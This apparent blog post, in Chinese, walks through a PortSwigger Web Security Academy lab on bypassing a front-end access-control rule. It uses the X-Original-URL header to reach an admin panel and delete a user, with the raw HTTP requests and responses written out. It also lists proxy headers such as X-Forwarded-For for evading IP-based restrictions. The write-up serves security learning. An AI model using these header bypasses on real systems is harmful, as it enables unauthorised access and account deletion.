<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"secdroid.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="0x01. PortSwigger Web Security AcademyPortSwigger Web Security Academy 是 Burp Suite 官方推出的免费 Web 安全学习靶场，在学习 Web 安全知识的同时，还可以练习 Burp Suite 的实战技能。 本篇文章讲解 Web Security Academy 之中的访问控制漏洞（Access Control Vuln">
<meta property="og:type" content="article">
<meta property="og:title" content="Burp Web Academy 访问控制漏洞（二）">
<meta property="og:url" content="https://secdroid.github.io/2025/01/08/burp-web-academy-access-control-vulnerabilities-part2/index.html">
<meta property="og:site_name" content="SecDroid">
<meta property="og:description" content="0x01. PortSwigger Web Security AcademyPortSwigger Web Security Academy 是 Burp Suite 官方推出的免费 Web 安全学习靶场，在学习 Web 安全知识的同时，还可以练习 Burp Suite 的实战技能。 本篇文章讲解 Web Security Academy 之中的访问控制漏洞（Access Control Vuln">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-01-08T13:10:50.470Z">
<meta property="article:modified_time" content="2025-01-19T02:47:50.000Z">
<meta property="article:author" content="Livermore">
<meta property="article:tag" content="Burp">
<meta property="article:tag" content="Access Control">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://secdroid.github.io/2025/01/08/burp-web-academy-access-control-vulnerabilities-part2/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://secdroid.github.io/2025/01/08/burp-web-academy-access-control-vulnerabilities-part2/","path":"2025/01/08/burp-web-academy-access-control-vulnerabilities-part2/","title":"Burp Web Academy 访问控制漏洞（二）"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Burp Web Academy 访问控制漏洞（二） | SecDroid</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">SecDroid</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">A security researcher who's looking for a job</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>链接</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-sitemap"><a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-PortSwigger-Web-Security-Academy"><span class="nav-number">1.</span> <span class="nav-text">0x01. PortSwigger Web Security Academy</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-Lab-URL-based-access-control-can-be-circumvented"><span class="nav-number">2.</span> <span class="nav-text">0x02. Lab: URL-based access control can be circumvented</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-%E9%A2%98%E7%9B%AE%E6%8F%8F%E8%BF%B0"><span class="nav-number">2.1.</span> <span class="nav-text">2.1 题目描述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-%E8%AE%BF%E9%97%AE%E4%B8%8D%E5%AD%98%E5%9C%A8%E7%9A%84-PATH"><span class="nav-number">2.2.</span> <span class="nav-text">2.2 访问不存在的 PATH</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-%E8%AE%BF%E9%97%AE%E5%AD%98%E5%9C%A8%E7%9A%84-PATH"><span class="nav-number">2.3.</span> <span class="nav-text">2.3 访问存在的 PATH</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-4-%E6%80%BB%E7%BB%93%E8%AE%BF%E9%97%AE%E8%A7%84%E5%88%99"><span class="nav-number">2.4.</span> <span class="nav-text">2.4 总结访问规则</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-5-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">2.5.</span> <span class="nav-text">2.5 漏洞利用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E4%BB%A3%E7%90%86%E5%AD%97%E6%AE%B5%E5%88%A9%E7%94%A8"><span class="nav-number">3.</span> <span class="nav-text">0x03. 代理字段利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-%E5%B8%B8%E8%A7%81%E5%AD%97%E6%AE%B5"><span class="nav-number">3.1.</span> <span class="nav-text">3.1 常见字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-%E6%B5%8B%E8%AF%95%E6%80%9D%E8%B7%AF"><span class="nav-number">3.2.</span> <span class="nav-text">3.2 测试思路</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-%E5%8F%82%E8%80%83%E6%96%87%E6%A1%A3"><span class="nav-number">4.</span> <span class="nav-text">0x04. 参考文档</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Livermore</p>
  <div class="site-description" itemprop="description">SecDroid's Diary</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">42</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">60</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://secdroid.github.io/2025/01/08/burp-web-academy-access-control-vulnerabilities-part2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Livermore">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SecDroid">
      <meta itemprop="description" content="SecDroid's Diary">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Burp Web Academy 访问控制漏洞（二） | SecDroid">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Burp Web Academy 访问控制漏洞（二）
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-01-08 21:10:50" itemprop="dateCreated datePublished" datetime="2025-01-08T21:10:50+08:00">2025-01-08</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-01-19 10:47:50" itemprop="dateModified" datetime="2025-01-19T10:47:50+08:00">2025-01-19</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Vulnerability/" itemprop="url" rel="index"><span itemprop="name">Vulnerability</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Vulnerability/Web/" itemprop="url" rel="index"><span itemprop="name">Web</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Vulnerability/Web/Burp-Web-Academy/" itemprop="url" rel="index"><span itemprop="name">Burp Web Academy</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="0x01-PortSwigger-Web-Security-Academy"><a href="#0x01-PortSwigger-Web-Security-Academy" class="headerlink" title="0x01. PortSwigger Web Security Academy"></a>0x01. PortSwigger Web Security Academy</h2><p>PortSwigger Web Security Academy 是 <a href="https://secdroid.github.io/tags/Burp/">Burp</a> Suite 官方推出的免费 Web 安全学习靶场，在学习 Web 安全知识的同时，还可以练习 Burp Suite 的实战技能。</p>
<p>本篇文章讲解 <a href="https://secdroid.github.io/categories/Vulnerability/Web/Burp-Web-Academy/">Web Security Academy</a> 之中的访问控制漏洞（Access Control Vulnerabilities）章节。</p>
<span id="more"></span>

<ul>
<li>Part1: <a href="https://secdroid.github.io/2025/01/07/burp-web-academy-access-control-vulnerabilities/">Burp Web Academy 访问控制漏洞</a></li>
<li>Part2: <a href="https://secdroid.github.io/2025/01/08/burp-web-academy-access-control-vulnerabilities-part2/">Burp Web Academy 访问控制漏洞（二）</a></li>
<li>Part3: <a href="https://secdroid.github.io/2025/01/11/burp-web-academy-access-control-vulnerabilities-part3/">Burp Web Academy 访问控制漏洞（三）</a></li>
</ul>
<h2 id="0x02-Lab-URL-based-access-control-can-be-circumvented"><a href="#0x02-Lab-URL-based-access-control-can-be-circumvented" class="headerlink" title="0x02. Lab: URL-based access control can be circumvented"></a>0x02. Lab: URL-based access control can be circumvented</h2><h3 id="2-1-题目描述"><a href="#2-1-题目描述" class="headerlink" title="2.1 题目描述"></a>2.1 题目描述</h3><blockquote>
<p>This website has an unauthenticated admin panel at <code>/admin</code>, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the <code>X-Original-URL</code> header.</p>
<p>To solve the lab, access the admin panel and delete the user <code>carlos</code>.</p>
</blockquote>
<p>这个题稍微复杂一点，需要有一定的解题套路。</p>
<p>首先，访问 <code>/admin</code>，得到如下返回信息：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">HTTP/2</span> <span class="number">403</span> Forbidden</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json; charset=utf-8</span><br><span class="line"><span class="attribute">X-Frame-Options</span><span class="punctuation">: </span>SAMEORIGIN</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>15</span><br><span class="line"></span><br><span class="line"><span class="language-1c"><span class="string">&quot;Access denied&quot;</span></span></span><br></pre></td></tr></table></figure>

<p>按照题目的意思，这种<strong>简单的回复信息</strong>可能是 <code>front-end system</code> 返回的。从笔者个人的理解来说，可能是类似 Nginx 一类的组件，对 URL 做了访问控制，比如这里禁止外部访问，还没有触达最终的服务器就提前拦截了。这里所谓的前端，不是通常意义上的 Web 前端，并不是用户能直接感知的部分，叫做中间组件可能更好理解一点，介于前端和后端之间。</p>
<p>像这样的中间组件，应该是可以根据规则给 HTTP 请求头增加新的字段的，用来标识请求到底来自哪里。因为最后端的服务器并不知道请求最初来自何方，所以中间组件的这个标识功能是需要的。</p>
<h3 id="2-2-访问不存在的-PATH"><a href="#2-2-访问不存在的-PATH" class="headerlink" title="2.2 访问不存在的 PATH"></a>2.2 访问不存在的 PATH</h3><p>回到题目的提示，这个标识应该就是 <code>X-Original-URL</code>，尝试访问一个合法的页面，但是 <code>X-Original-URL</code> 设置为不存在的页面：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/2</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>0a67001b03ad9ece81442a9700d9006a.web-security-academy.net</span><br><span class="line"><span class="attribute">X-Original-Url</span><span class="punctuation">: </span>/url-probe</span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<p>服务器返回 <code>404</code>：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">HTTP/2</span> <span class="number">404</span> Not Found</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json; charset=utf-8</span><br><span class="line"><span class="attribute">Set-Cookie</span><span class="punctuation">: </span>session=mKouAEkvGFCjTD2fFc4wL9F2TfIgKWl4; Secure; HttpOnly; SameSite=None</span><br><span class="line"><span class="attribute">X-Frame-Options</span><span class="punctuation">: </span>SAMEORIGIN</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>11</span><br><span class="line"></span><br><span class="line"><span class="language-1c"><span class="string">&quot;Not Found&quot;</span></span></span><br></pre></td></tr></table></figure>

<h3 id="2-3-访问存在的-PATH"><a href="#2-3-访问存在的-PATH" class="headerlink" title="2.3 访问存在的 PATH"></a>2.3 访问存在的 PATH</h3><p>修改 HTTP 请求头：<code>X-Original-Url</code> 指定为 <code>/product?productId=1</code></p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/2</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>0a67001b03ad9ece81442a9700d9006a.web-security-academy.net</span><br><span class="line"><span class="attribute">X-Original-Url</span><span class="punctuation">: </span>/product?productId=1</span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<p>服务器返回 <code>400</code>，提示没有 <code>productId</code> 参数：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">HTTP/2</span> <span class="number">400</span> Bad Request</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json; charset=utf-8</span><br><span class="line"><span class="attribute">Set-Cookie</span><span class="punctuation">: </span>session=dtJBzZ8uQlLSsNfUgiXKFqeQGbpUNeA2; Secure; HttpOnly; SameSite=None</span><br><span class="line"><span class="attribute">X-Frame-Options</span><span class="punctuation">: </span>SAMEORIGIN</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>30</span><br><span class="line"></span><br><span class="line"><span class="language-1c"><span class="string">&quot;Missing parameter: productId&quot;</span></span></span><br></pre></td></tr></table></figure>

<p>说明，<code>GET /</code> 通过了权限检查，实际访问了 <code>/product</code>，但是没有收到参数部分 <code>?productId=1</code>。可能参数是从 URL 取的，可以尝试把参数放到 URL 里面，重新测试：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/?productId=1</span> <span class="meta">HTTP/2</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>0a67001b03ad9ece81442a9700d9006a.web-security-academy.net</span><br><span class="line"><span class="attribute">X-Original-Url</span><span class="punctuation">: </span>/product</span><br></pre></td></tr></table></figure>

<p>这就跟访问了 <code>/product?productId=1</code> 的效果是一样的了。</p>
<h3 id="2-4-总结访问规则"><a href="#2-4-总结访问规则" class="headerlink" title="2.4 总结访问规则"></a>2.4 总结访问规则</h3><p>总结：</p>
<ol>
<li><code>GET</code> 指定的 URL，会被中间组件检查权限，如果没有访问权限，会被提前拦截</li>
<li>实际访问的 URL，可以根据 <code>X-Original-Url</code> 指定，但如果传递参数，则需要在 URL 中指定</li>
</ol>
<h3 id="2-5-漏洞利用"><a href="#2-5-漏洞利用" class="headerlink" title="2.5 漏洞利用"></a>2.5 漏洞利用</h3><p>先看看 <code>/admin</code> 页面的内容：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/2</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>0a67001b03ad9ece81442a9700d9006a.web-security-academy.net</span><br><span class="line"><span class="attribute">X-Original-Url</span><span class="punctuation">: </span>/admin</span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<p>返回如下信息：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">section</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span>&gt;</span>Users<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">span</span>&gt;</span>wiener - <span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;/admin/delete?username=wiener&quot;</span>&gt;</span>Delete<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">span</span>&gt;</span>carlos - <span class="tag">&lt;/<span class="name">span</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;/admin/delete?username=carlos&quot;</span>&gt;</span>Delete<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">section</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>根据前面的实验，构造删除用户的请求：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/?username=carlos</span> <span class="meta">HTTP/2</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>0a67001b03ad9ece81442a9700d9006a.web-security-academy.net</span><br><span class="line"><span class="attribute">X-Original-Url</span><span class="punctuation">: </span>/admin/delete</span><br><span class="line"><span class="attribute">Sec-Ch-Ua</span><span class="punctuation">: </span>&quot;Chromium&quot;;v=&quot;105&quot;, &quot;Not)A;Brand&quot;;v=&quot;8&quot;</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Mobile</span><span class="punctuation">: </span>?0</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Platform</span><span class="punctuation">: </span>&quot;Windows&quot;</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>none</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span><span class="punctuation">: </span>?1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br></pre></td></tr></table></figure>

<p>服务器返回 <code>302</code>，但是 <code>carlos</code> 已经被删除了：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">HTTP/2</span> <span class="number">302</span> Found</span><br><span class="line"><span class="attribute">Location</span><span class="punctuation">: </span>/admin</span><br><span class="line"><span class="attribute">Set-Cookie</span><span class="punctuation">: </span>session=33N0sQZ3ERudFlHeSvZoXFfuoXbg4aYk; Secure; HttpOnly; SameSite=None</span><br><span class="line"><span class="attribute">X-Frame-Options</span><span class="punctuation">: </span>SAMEORIGIN</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br></pre></td></tr></table></figure>

<h2 id="0x03-代理字段利用"><a href="#0x03-代理字段利用" class="headerlink" title="0x03. 代理字段利用"></a>0x03. 代理字段利用</h2><h3 id="3-1-常见字段"><a href="#3-1-常见字段" class="headerlink" title="3.1 常见字段"></a>3.1 常见字段</h3><p>前面提到的中间组件，类似 Nginx 这种，可以理解为一种代理服务器。像 <code>X-Original-Url</code> 这种字段并不是 HTTP RFC 中存在的概念，是代理服务器自己约定的字段，包括 <code>X-Forwarded-For</code> 这种。</p>
<p>尽管这些字段并不是 HTTP 请求头中标准的字段，但在约定俗成的背景下，可能已经成为了事实上的标准（<code>de-facto standard</code>），常见的字段如下：</p>
<ul>
<li><code>X-Original-URL</code></li>
<li><code>X-Rewrite-URL</code></li>
<li><code>X-Forwarded-For</code></li>
<li><code>X-Forward-For</code></li>
<li><code>X-Remote-IP</code></li>
<li><code>X-Originating-IP</code></li>
<li><code>X-Remote-Addr</code></li>
<li><code>X-Client-IP</code></li>
</ul>
<p><code>X-Forwarded-For</code> 常用来指明 HTTP 请求的原始 IP 地址，一些服务器会根据这个来判断请求来自何方，因此可以用来绕过一些 IP 相关的限制。像一些公司的办公网络，也会给 HTTP 请求头打上这个标记，可以通过外网能回显 HTTP 请求头的服务来确认。</p>
<h3 id="3-2-测试思路"><a href="#3-2-测试思路" class="headerlink" title="3.2 测试思路"></a>3.2 测试思路</h3><p>首先，发送正常的访问请求：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>www.example.com</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure>

<p>其次，发送 <code>X-Original-URL</code> 指向不存在 <code>URL</code> 的请求：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>www.example.com</span><br><span class="line"><span class="attribute">X-Original-URL</span><span class="punctuation">: </span>/donotexist1</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure>

<p>如果后者返回了 <code>404</code>，说明字段 <code>X-Original-URL</code> 是支持的，就可以尝试绕过中间代理组件的访问控制了。</p>
<h2 id="0x04-参考文档"><a href="#0x04-参考文档" class="headerlink" title="0x04. 参考文档"></a>0x04. 参考文档</h2><ol>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/all-labs#access-control-vulnerabilities">https://portswigger.net/web-security/all-labs#access-control-vulnerabilities</a></li>
<li><a target="_blank" rel="noopener" href="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema">https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema</a></li>
</ol>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Burp/" rel="tag"># Burp</a>
              <a href="/tags/Access-Control/" rel="tag"># Access Control</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/01/07/burp-web-academy-access-control-vulnerabilities/" rel="prev" title="Burp Web Academy 访问控制漏洞">
                  <i class="fa fa-angle-left"></i> Burp Web Academy 访问控制漏洞
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/01/11/burp-web-academy-access-control-vulnerabilities-part3/" rel="next" title="Burp Web Academy 访问控制漏洞（三）">
                  Burp Web Academy 访问控制漏洞（三） <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Livermore</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
